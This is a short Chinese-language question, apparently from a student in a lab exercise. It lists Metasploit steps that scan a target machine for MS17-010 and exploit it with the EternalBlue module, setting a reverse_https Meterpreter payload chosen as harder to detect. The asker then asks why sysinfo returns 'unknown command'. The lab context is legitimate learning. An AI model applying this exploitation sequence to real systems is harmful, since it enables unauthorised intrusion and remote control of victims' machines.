1.使用命令msfconsole启动metasploit平台
- 使用命令search搜索msf模块auxiliary/scanner/smb/smb_ms17_010验证目标靶机是否存在此漏洞。
3.使用命令use auxiliary/scanner/smb/smb_ms17_010来调用漏洞扫描检测模块。 使用show options查看需要配置的参数。
4.使用set RHOSTS设置靶机地址,使用exploit或者run命令运行扫描模块。
5.通过扫描发现目标靶机存在MS17_010漏洞,下一步使用use命令调用exploit/windows/smb/ms17_010_eternalblue漏洞利用模块,然后使用show options命令查看配置参数,并对目标靶机地址进行设置。
6.使用命令set PAYLOAD设置一个攻击在和模块,这里我们使用HTTPS协议的meterpreter反弹载荷windows/x64/meterpreter/reverse_https更不容易察觉。
7.使用命令show options查看载荷模块需要配置的参数。
8.使用命令set RHOST设置目标靶机地址,然后使用set LHOST设置渗透机地址。
9.使用命令run或者exploit来运行该模块,开始渗透。
10.使用命令sysinfo来查看目标靶机信息。
题目是这样的但是做到sysinfo报错了说unkonw commonand:sysinfo是为什么?
